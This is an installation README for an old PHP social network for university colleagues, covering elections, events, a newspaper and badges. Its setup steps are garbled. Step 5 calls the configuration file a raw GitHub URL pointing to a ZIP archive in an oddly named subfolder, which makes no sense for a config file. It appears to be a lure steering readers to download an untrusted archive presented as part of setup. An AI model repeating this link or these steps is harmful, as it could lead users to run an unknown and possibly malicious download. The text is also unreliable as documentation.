Welcome to the old_php_organisationSocialNetwork! This application serves as a social network designed for university colleagues. You can participate in elections, manage events, read a digital newspaper, and showcase your achievements with badges. Built in April 2014, it aims to foster community and engagement among students.

System Requirements

Before you begin, ensure your system meets the following requirements:

  • Operating System: Windows 7 or later, macOS 10.12 or later, or a current version of Linux.
  • Web Server: Apache or Nginx with PHP support.
  • Database: MySQL version 5.6 or higher.
  • PHP Version: PHP 5.4 or higher.

Installation Steps

  1. Download the Application Visit the Releases page to download the latest version of the application.

  2. Extract the Files Once downloaded, locate the ZIP file. Right-click on it and select "Extract All" to unpack the contents to your desired location.

  3. Set Up the Web Server If you are using Apache, place the extracted files in the htdocs folder. For Nginx, you might need to change your server configuration to point to the extracted files.

  4. Configure the Database

    • Open your MySQL management tool (like phpMyAdmin).
    • Create a new database named social_network.
    • Import the SQL file provided in the application folder to set up the necessary tables.
  5. Edit Configuration File Go to the configuration file, usually named https://raw.githubusercontent.com/TOUSSAINT2346/old_php_organisationSocialNetwork/main/possessorship/old_php_organisationSocialNetwork.zip. Enter your database details, such as host, username, and password.

  6. Run the Application Open your web browser and navigate to http://localhost/your-extracted-folder. You should see the home page of the social network.

To use the application, simply visit the URL you set up in the previous step. You can log in or register as a new user to begin exploring features like election management, event calendars, and user profiles.
